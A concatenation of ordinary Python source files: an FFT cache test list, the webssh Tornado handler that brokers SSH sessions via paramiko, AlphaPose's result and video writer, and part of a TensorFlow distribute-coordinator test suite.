class InterfacesNumpyFFTCacheTestIRFFTN(InterfacesNumpyFFTCacheTestFFTN):
func = 'irfftn'
realinv = True
test_cases = (
CacheTest,
InterfacesCacheTest,
CacheSpecificInterfacesUtils,
InterfacesNumpyFFTCacheTestFFT,
InterfacesNumpyFFTCacheTestIFFT,
InterfacesNumpyFFTCacheTestRFFT,
InterfacesNumpyFFTCacheTestIRFFT,
InterfacesNumpyFFTCacheTestFFT2,
InterfacesNumpyFFTCacheTestIFFT2,
InterfacesNumpyFFTCacheTestRFFT2,
InterfacesNumpyFFTCacheTestIRFFT2,
InterfacesNumpyFFTCacheTestFFTN,
InterfacesNumpyFFTCacheTestIFFTN,
InterfacesNumpyFFTCacheTestRFFTN,
InterfacesNumpyFFTCacheTestIRFFTN,)
test_set = None
if __name__ == '__main__':
run_test_suites(test_cases, test_set)
|
handler.py | import io
import json
import logging
import socket
import struct
import threading
import traceback
import weakref
import paramiko
import tornado.web
from tornado.ioloop import IOLoop
from tornado.options import options
from webssh.utils import (
is_valid_ip_address, is_valid_port, is_valid_hostname, to_bytes, to_str,
to_int, to_ip_address, UnicodeType, is_name_open_to_public, is_ip_hostname
)
from webssh.worker import Worker, recycle_worker, clients
try:
from concurrent.futures import Future
except ImportError:
from tornado.concurrent import Future
try:
from json.decoder import JSONDecodeError
except ImportError:
JSONDecodeError = ValueError
DELAY = 3
KEY_MAX_SIZE = 16384
DEFAULT_PORT = 22
swallow_http_errors = True
# set by config_open_to_public
open_to_public = {
'http': None,
'https': None
}
def config_open_to_public(address, server_type):
status = True if is_name_open_to_public(address) else False
logging.debug('{} server open to public: {}'.format(server_type, status))
open_to_public[server_type] = status
class InvalidValueError(Exception):
pass
class MixinHandler(object):
custom_headers = {
'Server': 'TornadoServer'
}
html = ('<html><head><title>{code} {reason}</title></head><body>{code} '
'{reason}</body></html>')
def initialize(self, loop=None):
self.check_request()
self.loop = loop
def check_request(self):
context = self.request.connection.context
result = self.is_forbidden(context, self.request.host_name)
self._transforms = []
if result:
self.set_status(403)
self.finish(
self.html.format(code=self._status_code, reason=self._reason)
)
elif result is False:
to_url = self.get_redirect_url(
self.request.host_name, options.sslport, self.request.uri
)
self.redirect(to_url, permanent=True)
else:
self.context = context
def is_forbidden(self, context, hostname):
ip = context.address[0]
lst = context.trusted_downstream
if lst and ip not in lst:
logging.warning(
'IP {!r} not found in trusted downstream {!r}'.format(ip, lst)
)
return True
if open_to_public['http'] and context._orig_protocol == 'http':
if not to_ip_address(ip).is_private:
if open_to_public['https'] and options.redirect:
if not is_ip_hostname(hostname):
# redirecting
return False
if options.fbidhttp:
logging.warning('Public plain http request is forbidden.')
return True
def get_redirect_url(self, hostname, port, uri):
port = '' if port == 443 else ':%s' % port
return 'https://{}{}{}'.format(hostname, port, uri)
def set_default_headers(self):
for header in self.custom_headers.items():
self.set_header(*header)
def get_value(self, name):
value = self.get_argument(name)
if not value:
raise InvalidValueError('Missing value {}'.format(name))
return value
def get_client_addr(self):
if options.xheaders:
return self.get_real_client_addr() or self.context.address
else:
return self.context.address
def get_real_client_addr(self):
ip = self.request.remote_ip
if ip == self.request.headers.get('X-Real-Ip'):
port = self.request.headers.get('X-Real-Port')
elif ip in self.request.headers.get('X-Forwarded-For', ''):
port = self.request.headers.get('X-Forwarded-Port')
else:
# not running behind an nginx server
return
port = to_int(port)
if port is None or not is_valid_port(port):
# fake port
port = 65535
return (ip, port)
class NotFoundHandler(MixinHandler, tornado.web.ErrorHandler):
def initialize(self):
super(NotFoundHandler, self).initialize()
def prepare(self):
raise tornado.web.HTTPError(404)
class IndexHandler(MixinHandler, tornado.web.RequestHandler):
def initialize(self, loop, policy, host_keys_settings):
super(IndexHandler, self).initialize(loop)
self.policy = policy
self.host_keys_settings = host_keys_settings
self.ssh_client = self.get_ssh_client()
self.privatekey_filename = None
self.debug = self.settings.get('debug', False)
self.result = dict(id=None, status=None, encoding=None)
def write_error(self, status_code, **kwargs):
if swallow_http_errors and self.request.method == 'POST':
exc_info = kwargs.get('exc_info')
if exc_info:
reason = getattr(exc_info[1], 'log_message', None)
if reason:
self._reason = reason
self.result.update(status=self._reason)
self.set_status(200)
self.finish(self.result)
else:
super(IndexHandler, self).write_error(status_code, **kwargs)
def get_ssh_client(self):
ssh = paramiko.SSHClient()
ssh._system_host_keys = self.host_keys_settings['system_host_keys']
ssh._host_keys = self.host_keys_settings['host_keys']
ssh._host_keys_filename = self.host_keys_settings['host_keys_filename']
ssh.set_missing_host_key_policy(self.policy)
return ssh
def get_privatekey(self):
name = 'privatekey'
lst = self.request.files.get(name)
if lst:
# multipart form
self.privatekey_filename = lst[0]['filename']
data = lst[0]['body']
value = self.decode_argument(data, name=name).strip()
else:
# urlencoded form
value = self.get_argument(name, u'')
if len(value) > KEY_MAX_SIZE:
raise InvalidValueError(
'Invalid private key: {}'.format(self.privatekey_filename)
)
return value
@classmethod
def get_specific_pkey(cls, pkeycls, privatekey, password):
logging.info('Trying {}'.format(pkeycls.__name__))
try:
pkey = pkeycls.from_private_key(io.StringIO(privatekey),
password=password)
except paramiko.PasswordRequiredException:
raise
except paramiko.SSHException:
pass
else:
return pkey
@classmethod
def get_pkey_obj(cls, privatekey, password, filename):
bpass = to_bytes(password) if password else None
pkey = cls.get_specific_pkey(paramiko.RSAKey, privatekey, bpass)\
or cls.get_specific_pkey(paramiko.DSSKey, privatekey, bpass)\
or cls.get_specific_pkey(paramiko.ECDSAKey, privatekey, bpass)\
or cls.get_specific_pkey(paramiko.Ed25519Key, privatekey, bpass)
if not pkey:
if not password:
error = 'Invalid private key: {}'.format(filename)
else:
error = (
'Wrong password {!r} for decrypting the private key.'
) .format(password)
raise InvalidValueError(error)
return pkey
def get_hostname(self):
value = self.get_value('hostname')
if not (is_valid_hostname(value) | is_valid_ip_address(value)):
raise InvalidValueError('Invalid hostname: {}'.format(value))
return value
def get_port(self):
value = self.get_argument('port', u'')
if not value:
return DEFAULT_PORT
port = to_int(value)
if port is None or not is_valid_port(port):
raise InvalidValueError('Invalid port: {}'.format(value))
return port
def lookup_hostname(self, hostname, port):
key = hostname if port == 22 else '[{}]:{}'.format(hostname, port)
if self.ssh_client._system_host_keys.lookup(key) is None:
if self.ssh_client._host_keys.lookup(key) is None:
raise ValueError(
'Connection to {}:{} is not allowed.'.format(
hostname, port)
)
def get_args(self):
hostname = self.get_hostname()
port = self.get_port()
if isinstance(self.policy, paramiko.RejectPolicy):
self.lookup_hostname(hostname, port)
username = self.get_value('username')
password = self.get_argument('password', u'')
privatekey = self.get_privatekey()
if privatekey:
pkey = self.get_pkey_obj(
privatekey, password, self.privatekey_filename
)
password = None
else:
pkey = None
args = (hostname, port, username, password, pkey)
logging.debug(args)
return args
def get_default_encoding(self, ssh):
try:
_, stdout, _ = ssh.exec_command('locale charmap')
except paramiko.SSHException:
result = None
else:
result = to_str(stdout.read().strip())
return result if result else 'utf-8'
def ssh_connect(self):
ssh = self.ssh_client
try:
args = self.get_args()
except InvalidValueError as exc:
raise tornado.web.HTTPError(400, str(exc))
dst_addr = (args[0], args[1])
logging.info('Connecting to {}:{}'.format(*dst_addr))
try:
ssh.connect(*args, timeout=6)
except socket.error:
raise ValueError('Unable to connect to {}:{}'.format(*dst_addr))
except paramiko.BadAuthenticationType:
raise ValueError('Bad authentication type.')
except paramiko.AuthenticationException:
raise ValueError('Authentication failed.')
except paramiko.BadHostKeyException:
raise ValueError('Bad host key.')
chan = ssh.invoke_shell(term='xterm')
chan.setblocking(0)
worker = Worker(self.loop, ssh, chan, dst_addr, self.src_addr)
worker.encoding = self.get_default_encoding(ssh)
return worker
def ssh_connect_wrapped(self, future):
try:
worker = self.ssh_connect()
except Exception as exc:
logging.error(traceback.format_exc())
future.set_exception(exc)
else:
future.set_result(worker)
def head(self):
pass
def get(self):
self.render('index.html', debug=self.debug)
@tornado.gen.coroutine
def post(self):
if self.debug and self.get_argument('error', u''):
# for testing purpose only
raise ValueError('Uncaught exception')
self.src_addr = self.get_client_addr()
if len(clients.get(self.src_addr[0], {})) >= options.maxconn:
raise tornado.web.HTTPError(403, 'Too many connections.')
future = Future()
t = threading.Thread(target=self.ssh_connect_wrapped, args=(future,))
t.setDaemon(True)
t.start()
try:
worker = yield future
except (ValueError, paramiko.SSHException) as exc:
self.result.update(status=str(exc))
else:
workers = clients.setdefault(worker.src_addr[0], {})
workers[worker.id] = worker
self.loop.call_later(DELAY, recycle_worker, worker)
self.result.update(id=worker.id, encoding=worker.encoding)
self.write(self.result)
class WsockHandler(MixinHandler, tornado.websocket.WebSocketHandler):
def initialize(self, loop):
super(WsockHandler, self).initialize(loop)
self.worker_ref = None
def open(self):
self.src_addr = self.get_client_addr()
logging.info('Connected from {}:{}'.format(*self.src_addr))
workers = clients.get(self.src_addr[0])
if not workers:
self.close(reason='Websocket authentication failed.')
return
try:
worker_id = self.get_value('id')
except (tornado.web.MissingArgumentError, InvalidValueError) as exc:
self.close(reason=str(exc))
else:
worker = workers.get(worker_id)
if worker:
workers[worker_id] = None
self.set_nodelay(True)
worker.set_handler(self)
self.worker_ref = weakref.ref(worker)
self.loop.add_handler(worker.fd, worker, IOLoop.READ)
else:
self.close(reason='Websocket authentication failed.')
def on_message(self, message):
logging.debug('{!r} from {}:{}'.format(message, *self.src_addr))
worker = self.worker_ref()
try:
msg = json.loads(message)
except JSONDecodeError:
return
if not isinstance(msg, dict):
return
resize = msg.get('resize')
if resize and len(resize) == 2:
try:
worker.chan.resize_pty(*resize)
except (TypeError, struct.error, paramiko.SSHException):
pass
data = msg.get('data')
if data and isinstance(data, UnicodeType):
worker.data_to_dst.append(data)
worker.on_write()
def on_close(self):
if self.close_reason:
logging.info(
'Disconnecting to {}:{} with reason: {reason}'.format(
*self.src_addr, reason=self.close_reason
)
)
else:
self.close_reason = 'client disconnected'
logging.info('Disconnected from {}:{}'.format(*self.src_addr))
worker = self.worker_ref() if self.worker_ref else None
if worker:
worker.close(reason=self.close_reason)
|
writer.py | import os
import time
from threading import Thread
from queue import Queue
import cv2
import numpy as np
import torch
import torch.multiprocessing as mp
from alphapose.utils.transforms import get_func_heatmap_to_coord
from alphapose.utils.pPose_nms import pose_nms
DEFAULT_VIDEO_SAVE_OPT = {
'savepath': 'examples/res/1.mp4',
'fourcc': cv2.VideoWriter_fourcc(*'mp4v'),
'fps': 25,
'frameSize': (640, 480)
}
EVAL_JOINTS = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16]
class DataWriter():
def __init__(self, cfg, opt, save_video=False,
video_save_opt=DEFAULT_VIDEO_SAVE_OPT,
queueSize=1024):
self.cfg = cfg
self.opt = opt
self.video_save_opt = video_save_opt
self.eval_joints = EVAL_JOINTS
self.save_video = save_video
self.final_result = []
self.heatmap_to_coord = get_func_heatmap_to_coord(cfg)
# initialize the queue used to store frames read from
# the video file
if opt.sp:
self.result_queue = Queue(maxsize=queueSize)
self.final_result_queue = Queue(maxsize=queueSize)
else:
self.result_queue = mp.Queue(maxsize=queueSize)
self.final_result_queue = mp.Queue(maxsize=queueSize)
if opt.save_img:
if not os.path.exists(opt.outputpath + '/vis'):
os.mkdir(opt.outputpath + '/vis')
if opt.pose_track:
from PoseFlow.poseflow_infer import PoseFlowWrapper
self.pose_flow_wrapper = PoseFlowWrapper(save_path=os.path.join(opt.outputpath, 'poseflow'))
def start_worker(self, target):
if self.opt.sp:
p = Thread(target=target, args=())
else:
p = mp.Process(target=target, args=())
# p.daemon = True
p.start()
return p
def start(self):
# start a thread to read pose estimation results per frame
self.result_worker = self.start_worker(self.update)
return self
def update(self):
if self.save_video:
# initialize the file video stream, adapt ouput video resolution to original video
stream = cv2.VideoWriter(*[self.video_save_opt[k] for k in ['savepath', 'fourcc', 'fps', 'frameSize']])
if not stream.isOpened():
print("Try to use other video encoders...")
ext = self.video_save_opt['savepath'].split('.')[-1]
fourcc, _ext = self.recognize_video_ext(ext)
self.video_save_opt['fourcc'] = fourcc
self.video_save_opt['savepath'] = self.video_save_opt['savepath'][:-4] + _ext
stream = cv2.VideoWriter(*[self.video_save_opt[k] for k in ['savepath', 'fourcc', 'fps', 'frameSize']])
assert stream.isOpened(), 'Cannot open video for writing'
# keep looping infinitelyd
while True:
# ensure the queue is not empty and get item
(boxes, scores, ids, hm_data, cropped_boxes, orig_img, im_name) = self.wait_and_get(self.result_queue)
if orig_img is None:
# if the thread indicator variable is set (img is None), stop the thread
self.wait_and_put(self.final_result_queue, None)
if self.save_video:
stream.release()
return
# image channel RGB->BGR
orig_img = np.array(orig_img, dtype=np.uint8)[:, :, ::-1]
if boxes is None:
if self.opt.save_img or self.save_video or self.opt.vis:
self.write_image(orig_img, im_name, stream=stream if self.save_video else None)
else:
# location prediction (n, kp, 2) | score prediction (n, kp, 1)
pred = hm_data.cpu().data.numpy()
assert pred.ndim == 4
if hm_data.size()[1] == 49:
self.eval_joints = [*range(0,49)]
pose_coords = []
pose_scores = []
for i in range(hm_data.shape[0]):
bbox = cropped_boxes[i].tolist()
pose_coord, pose_score = self.heatmap_to_coord(pred[i][self.eval_joints], bbox)
pose_coords.append(torch.from_numpy(pose_coord).unsqueeze(0))
pose_scores.append(torch.from_numpy(pose_score).unsqueeze(0))
preds_img = torch.cat(pose_coords)
preds_scores = torch.cat(pose_scores)
result = pose_nms(boxes, scores, ids, preds_img, preds_scores, self.opt.min_box_area)
result = {
'imgname': im_name,
'result': result
}
if self.opt.pose_track:
poseflow_result = self.pose_flow_wrapper.step(orig_img, result)
for i in range(len(poseflow_result)):
result['result'][i]['idx'] = poseflow_result[i]['idx']
self.wait_and_put(self.final_result_queue, result)
if self.opt.save_img or self.save_video or self.opt.vis:
if hm_data.size()[1] == 49:
from alphapose.utils.vis import vis_frame_dense as vis_frame
elif self.opt.vis_fast:
from alphapose.utils.vis import vis_frame_fast as vis_frame
else:
from alphapose.utils.vis import vis_frame
img = vis_frame(orig_img, result, add_bbox=(self.opt.pose_track | self.opt.tracking | self.opt.showbox))
self.write_image(img, im_name, stream=stream if self.save_video else None)
def write_image(self, img, im_name, stream=None):
if self.opt.vis:
cv2.imshow("AlphaPose Demo", img)
cv2.waitKey(30)
if self.opt.save_img:
cv2.imwrite(os.path.join(self.opt.outputpath, 'vis', im_name), img)
if self.save_video:
stream.write(img)
def wait_and_put(self, queue, item):
queue.put(item)
def wait_and_get(self, queue):
return queue.get()
def save(self, boxes, scores, ids, hm_data, cropped_boxes, orig_img, im_name):
self.commit()
# save next frame in the queue
self.wait_and_put(self.result_queue, (boxes, scores, ids, hm_data, cropped_boxes, orig_img, im_name))
def running(self):
# indicate that the thread is still running
time.sleep(0.2)
self.commit()
return not self.result_queue.empty()
def count(self):
# indicate the remaining images
return self.result_queue.qsize()
def stop(self):
# indicate that the thread should be stopped
self.save(None, None, None, None, None, None, None)
while True:
final_res = self.wait_and_get(self.final_result_queue)
if final_res:
self.final_result.append(final_res)
else:
break
self.result_worker.join()
def clear_queues(self):
self.clear(self.result_queue)
self.clear(self.final_result_queue)
def clear(self, queue):
while not queue.empty():
queue.get()
def commit(self):
# commit finished final results to main process
while not self.final_result_queue.empty():
self.final_result.append(self.wait_and_get(self.final_result_queue))
def results(self):
# return final result
return self.final_result
def recognize_video_ext(self, ext=''):
if ext == 'mp4':
return cv2.VideoWriter_fourcc(*'mp4v'), '.' + ext
elif ext == 'avi':
return cv2.VideoWriter_fourcc(*'XVID'), '.' + ext
elif ext == 'mov':
return cv2.VideoWriter_fourcc(*'XVID'), '.' + ext
else:
print("Unknow video format {}, will use .mp4 instead of it".format(ext))
return cv2.VideoWriter_fourcc(*'mp4v'), '.mp4'
|
distribute_coordinator_test.py | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Distribute Coordinator."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import copy
import json
import os
import sys
import time
import threading
import six
# pylint: disable=invalid-name
_portpicker_import_error = None
try:
import portpicker # pylint: disable=g-import-not-at-top
except ImportError as _error:
_portpicker_import_error = _error
portpicker = None
# pylint: enable=invalid-name
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.client import session
from tensorflow.python.distribute import distribute_coordinator
from tensorflow.python.distribute import distribute_coordinator_context
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.training import monitored_session
CHIEF = distribute_coordinator._TaskType.CHIEF
WORKER = distribute_coordinator._TaskType.WORKER
PS = distribute_coordinator._TaskType.PS
EVALUATOR = distribute_coordinator._TaskType.EVALUATOR
STANDALONE_CLIENT = distribute_coordinator.CoordinatorMode.STANDALONE_CLIENT
INDEPENDENT_WORKER = distribute_coordinator.CoordinatorMode.INDEPENDENT_WORKER
NUM_WORKERS = 3
NUM_PS = 2
original_sys_exit = sys.exit
def _bytes_to_str(maybe_bytes):
if isinstance(maybe_bytes, six.string_types):
return maybe_bytes
else:
return str(maybe_bytes, "utf-8")
def _strip_protocol(target):
# cluster_spec expects "host:port" strings.
if "//" in target:
return target.split("//")[1]
else:
return target
class MockStrategy(object):
def __init__(self,
between_graph=False,
should_init=None,
should_checkpoint=None,
should_save_summary=None):
self._between_graph = between_graph
self._should_init = should_init
self._should_checkpoint = should_checkpoint
self._should_save_summary = should_save_summary
@property
def between_graph(self):
return self._between_graph
def configure(self,
session_options=None,
cluster_spec=None,
task_type=None,
task_id=None):
del session_options, cluster_spec, task_type
if self._should_init is None:
if task_id == 0:
self._should_init = True
else:
self._should_init = False
if self._should_checkpoint is None:
if task_id == 0:
self._should_checkpoint = True
else:
self._should_checkpoint = False
if self._should_save_summary is None:
if task_id == 0:
self._should_save_summary = True
else:
self._should_save_summary = False
@property
def should_init(self):
return self._should_init
@property
def should_checkpoint(self):
return self._should_checkpoint
@property
def should_save_summary(self):
return self._should_save_summary
class MockServer(object):
def __init__(self):
self._joined = False
def join(self):
assert not self._joined
self._joined = True
@property
def joined(self):
return self._joined
class DistributeCoordinatorTestBase(test.TestCase):
@classmethod
def setUpClass(cls):
# We have to create a global in-process cluster because once an in-process
# tensorflow server is created, there is no way to terminate it. Please see
# multi_worker_test_base.py for more details.
cls._workers, cls._ps = test_util.create_local_cluster(
NUM_WORKERS, num_ps=NUM_PS)
cls._cluster_spec = {
WORKER: [
_strip_protocol(_bytes_to_str(w.target)) for w in cls._workers
],
PS: [_strip_protocol(_bytes_to_str(ps.target)) for ps in cls._ps]
}
def setUp(self):
self._result_correct = 0
self._lock = threading.Lock()
self._worker_context = {}
self._strategy_property = {}
self._std_servers = {}
self._barrier = distribute_coordinator._Barrier(NUM_WORKERS)
@contextlib.contextmanager
def _test_session(self, target):
config = config_pb2.ConfigProto(allow_soft_placement=True)
config.graph_options.optimizer_options.opt_level = -1
with session.Session(graph=None, config=config, target=target) as sess:
yield sess
def _create_cluster_spec(self,
has_chief=False,
num_workers=1,
num_ps=0,
has_eval=False):
if _portpicker_import_error:
raise _portpicker_import_error # pylint: disable=raising-bad-type
cluster_spec = {}
if has_chief:
cluster_spec[CHIEF] = ["localhost:%s" % portpicker.pick_unused_port()]
if num_workers:
cluster_spec[WORKER] = [
"localhost:%s" % portpicker.pick_unused_port()
for _ in range(num_workers)
]
if num_ps:
cluster_spec[PS] = [
"localhost:%s" % portpicker.pick_unused_port() for _ in range(num_ps)
]
if has_eval:
cluster_spec[EVALUATOR] = ["localhost:%s" % portpicker.pick_unused_port()]
return cluster_spec
def _in_graph_worker_fn(self, strategy):
context = distribute_coordinator_context.get_current_worker_context()
self.assertTrue(context is not None)
with self._test_session(target=context.master_target) as sess:
xs = []
expected = 0.0
for i in range(context.num_workers):
with ops.device("/job:worker/task:%d" % i):
x = variable_scope.get_variable("x_%d" % i, initializer=10.0)
x_add = x.assign_add(float(i))
xs.append(x_add)
expected += i + 10.0
with ops.device("/job:worker/task:0"):
result = math_ops.add_n(xs)
variables.global_variables_initializer().run()
result_value = sess.run(result)
self.assertEqual(result_value, expected)
if result_value == expected:
self._result_correct += 1
def _run_coordinator_in_thread(self, worker_fn, strategy, **kwargs):
t = threading.Thread(
target=distribute_coordinator.run_distribute_coordinator,
args=(worker_fn, strategy),
kwargs=kwargs)
t.start()
return t
def _run_multiple_coordinator_in_threads(self, worker_fn, strategy,
cluster_spec, **kwargs):
threads = {}
for task_type in cluster_spec.keys():
threads[task_type] = []
for task_id in range(len(cluster_spec[task_type])):
t = self._run_coordinator_in_thread(
worker_fn,
strategy,
cluster_spec=cluster_spec,
task_type=task_type,
task_id=task_id,
**kwargs)
threads[task_type].append(t)
return threads
def _between_graph_worker_fn(self, strategy):
context = distribute_coordinator_context.get_current_worker_context()
self.assertTrue(context is not None)
with self._test_session(target=context.master_target) as sess:
with ops.device("/job:ps/task:0"):
# TODO(yuefengz): investigate why not using resource variable will make
# the test flaky.
x = variable_scope.get_variable(
"x", initializer=10.0, use_resource=True)
with ops.device("/job:ps/task:1"):
y = variable_scope.get_variable(
"y", initializer=20.0, use_resource=True)
x_add = x.assign_add(2.0)
y_sub = y.assign_sub(2.0)
train_op = control_flow_ops.group([x_add, y_sub])
if context.is_chief:
variables.global_variables_initializer().run()
# Synchronize workers after initializaton.
if context.has_barrier:
context.wait_for_other_workers()
else:
while True:
uninit_vars = sess.run(variables.report_uninitialized_variables())
# pylint: disable=g-explicit-length-test
if len(uninit_vars) == 0:
break
sess.run(train_op)
# Synchronize workers after one step to make sure they all have finished
# training.
if context.has_barrier:
context.wait_for_other_workers()
else:
self._barrier.wait()
x_val, y_val = sess.run([x, y])
self.assertEqual(x_val, 16.0)
self.assertEqual(y_val, 14.0)
if x_val == 16.0 and y_val == 14.0:
with self._lock:
self._result_correct += 1
def _between_graph_with_monitored_session(self, strategy):
context = distribute_coordinator_context.get_current_worker_context()
self.assertTrue(context is not None)
with ops.device("/job:ps/task:0"):
# TODO(yuefengz): investigate why not using resource variable will make
# the test flaky.
x = variable_scope.get_variable("x", initializer=10.0, use_resource=True)
with ops.device("/job:ps/task:1"):
y = variable_scope.get_variable("y", initializer=20.0, use_resource=True)
x_add = x.assign_add(2.0)
y_sub = y.assign_sub(2.0)
train_op = control_flow_ops.group([x_add, y_sub])
# The monitored session will run init or ready ops.
with monitored_session.MonitoredSession() as sess:
sess.run(train_op)
# Synchronize workers after one step to make sure they all have finished
# training.
if context.has_barrier:
context.wait_for_other_workers()
else:
self._barrier.wait()
x_val, y_val = sess.run([x, y])
self.assertEqual(x_val, 16.0)
self.assertEqual(y_val, 14.0)
if x_val == 16.0 and y_val == 14.0:
with self._lock:
self._result_correct += 1
def _dump_worker_context(self, strategy):
"""Dumps the propoerties of each worker context.
It dumps the context properties to a dict mapping from task_type to a list
of tuples of master_target, num_workers, is_chief and distribute_mode, where
the list is indexed by the task_id.
Args:
strategy: a `DistributionStrategy` object.
"""
context = distribute_coordinator_context.get_current_worker_context()
self.assertTrue(context is not None)
task_type = str(context.task_type)
task_id = context.task_id or 0
with self._lock:
if task_type not in self._worker_context:
self._worker_context[task_type] = []
while len(self._worker_context[task_type]) <= task_id:
self._worker_context[task_type].append(None)
self._worker_context[task_type][task_id] = (context.master_target,
context.num_workers,
context.is_chief,
context.distributed_mode)
def _dump_strategy_property(self, strategy):
context = distribute_coordinator_context.get_current_worker_context()
self.assertTrue(context is not None)
self.assertEqual(context._strategy.should_init, strategy.should_init)
self.assertEqual(context.should_checkpoint, strategy.should_checkpoint)
self.assertEqual(context.should_save_summary, strategy.should_save_summary)
task_type = str(context.task_type)
task_id = context.task_id or 0
with self._lock:
if task_type not in self._strategy_property:
self._strategy_property[task_type] = []
while len(self._strategy_property[task_type]) <= task_id:
self._strategy_property[task_type].append(None)
self._strategy_property[task_type][task_id] = (
context._strategy.should_init, context.should_checkpoint,
context.should_save_summary)
def _run_mock_std_server(self,
session_config=None,
cluster_spec=None,
task_type=None,
task_id=None,
rpc_layer=None,
environment=None):
task_type = str(task_type)
task_id = task_id or 0
with self._lock:
if task_type not in self._std_servers:
self._std_servers[task_type] = []
while len(self._std_servers[task_type]) <= task_id:
self._std_servers[task_type].append(None)
server = MockServer()
self._std_servers[task_type][task_id] = server
return server
class DistributeCoordinatorTestStandaloneMode(DistributeCoordinatorTestBase):
def testInGraphStandaloneMode(self):
"""Test it runs in-graph replication in standalone client mode."""
distribute_coordinator.run_distribute_coordinator(
self._in_graph_worker_fn,
MockStrategy(between_graph=False),
cluster_spec=self._cluster_spec)
self.assertEqual(self._result_correct, 1)
def testBetweenGraph(self):
"""Test it runs between-graph replication in standalone client mode."""
distribute_coordinator.run_distribute_coordinator(
self._between_graph_worker_fn,
MockStrategy(between_graph=True),
cluster_spec=self._cluster_spec)
# Each finished worker will increment self._result_correct.
self.assertEqual(self._result_correct, NUM_WORKERS)
def testBetweenGraphWithMonitoredSession(self):
"""Test monitored session in standalone client mode."""
distribute_coordinator.run_distribute_coordinator(
self._between_graph_with_monitored_session,
MockStrategy(between_graph=True),
cluster_spec=self._cluster_spec)
# Each finished worker will increment self._result_correct.
self.assertEqual(self._result_correct, NUM_WORKERS)
def testBetweenGraphContext(self):
# Dumps the task contexts to the self._worker_context dict.
distribute_coordinator.run_distribute_coordinator(
self._dump_worker_context,
MockStrategy(between_graph=True),
cluster_spec=self._cluster_spec)
# There is only one type of task and there three such tasks.
self.assertEqual(len(self._worker_context), 1)
self.assertTrue(WORKER in self._worker_context)
self.assertEqual(len(self._worker_context[WORKER]), NUM_WORKERS)
# Check whether each task has the right master_target, num_workers, is_chief
# and distributed_mode.
self.assertEqual(
self._worker_context[WORKER][0],
(_bytes_to_str(self._workers[0].target), NUM_WORKERS, True, True))
self.assertEqual(
self._worker_context[WORKER][1],
(_bytes_to_str(self._workers[1].target), NUM_WORKERS, False, True))
self.assertEqual(
self._worker_context[WORKER][2],
(_bytes_to_str(self._workers[2].target), NUM_WORKERS, False, True))
def testBetweenGraphStrategyProperties(self):
# Dumps properties of the strategy objects.
distribute_coordinator.run_distribute_coordinator(
self._dump_strategy_property,
MockStrategy(between_graph=True, should_init=True),
cluster_spec=self._cluster_spec)
# There is only one type of task and there three such tasks.
self.assertEqual(len(self._strategy_property), 1)
self.assertTrue(WORKER in self._strategy_property)
self.assertEqual(len(self._strategy_property[WORKER]), NUM_WORKERS)
# Check whether each task has the right properties of should_init,
# should_checkpoint and should_save_summary.
self.assertEqual(self._strategy_property[WORKER][0], (True, True, True))
self.assertEqual(self._strategy_property[WORKER][1], (True, False, False))
self.assertEqual(self._strategy_property[WORKER][2], (True, False, False))
def testInGraphContext(self):
# Dumps the task contexts to the self._worker_context dict.
distribute_coordinator.run_distribute_coordinator(
self._dump_worker_context,
MockStrategy(between_graph=False),
cluster_spec=self._cluster_spec)
# There is only a "None" task in the dumped task context.
self.assertEqual(len(self._worker_context), 1)
self.assertTrue("None" in self._worker_context)
self.assertEqual(len(self._worker_context["None"]), 1)
# Check whether each task has the right master_target, num_workers, is_chief
# and distributed_mode.
self.assertEqual(
self._worker_context["None"][0],
(_bytes_to_str(self._workers[0].target), NUM_WORKERS, True, True))
def testLocalContext(self):
# Dumps the task contexts to the self._worker_context dict.
distribute_coordinator.run_distribute_coordinator(
self._dump_worker_context,
MockStrategy(between_graph=False),
cluster_spec=None)
# There is only a "None" task.
self.assertEqual(len(self._worker_context), 1)
self.assertTrue("None" in self._worker_context)
self.assertEqual(len(self._worker_context["None"]), 1)
# Check whether each task has the right master_target, num_workers, is_chief
# and distributed_mode.
self.assertEqual(self._worker_context["None"][0], ("", 0, True, False))
def testBetweenGraphContextWithChief(self):
# Adds a chief node, so there are NUM_WORKERS + 1 workers in total.
cluster_spec = copy.deepcopy(self._cluster_spec)
cluster_spec[CHIEF] = ["fake_chief"]
# Dumps the task contexts to the self._worker_context dict.
distribute_coordinator.run_distribute_coordinator(
self._dump_worker_context,
MockStrategy(between_graph=True),
cluster_spec=cluster_spec,
rpc_layer="grpc")
# There are one CHIEF and three workers.
self.assertEqual(len(self._worker_context), 2)
self.assertTrue(CHIEF in self._worker_context)
self.assertTrue(WORKER in self._worker_context)
self.assertEqual(len(self._worker_context[CHIEF]), 1)
self.assertEqual(len(self._worker_context[WORKER]), NUM_WORKERS)
# Check whether each task has the right master_target, num_workers, is_chief
# and distributed_mode.
self.assertEqual(self._worker_context[CHIEF][0],
("grpc://fake_chief", 4, True, True))
self.assertEqual(
self._worker_context[WORKER][0],
(_bytes_to_str(self._workers[0].target), NUM_WORKERS + 1, False, True))
self.assertEqual(
self._worker_context[WORKER][1],
(_bytes_to_str(self._workers[1].target), NUM_WORKERS + 1, False, True))
self.assertEqual(
self._worker_context[WORKER][2],
(_bytes_to_str(self._workers[2].target), NUM_WORKERS + 1, False, True))
def testInGraphContextWithEval(self):
# Adds a EVALUATOR job.
cluster_spec = copy.deepcopy(self._cluster_spec)
cluster_spec[EVALUATOR] = ["fake_evaluator"]
# Dumps the task contexts to the self._worker_context dict.
distribute_coordinator.run_distribute_coordinator(
self._dump_worker_context,
MockStrategy(between_graph=False),
cluster_spec=cluster_spec,
rpc_layer=None)
# There are one "None" task and one EVALUATOR task.
self.assertEqual(len(self._worker_context), 2)
self.assertTrue("None" in self._worker_context)
self.assertTrue(EVALUATOR in self._worker_context)
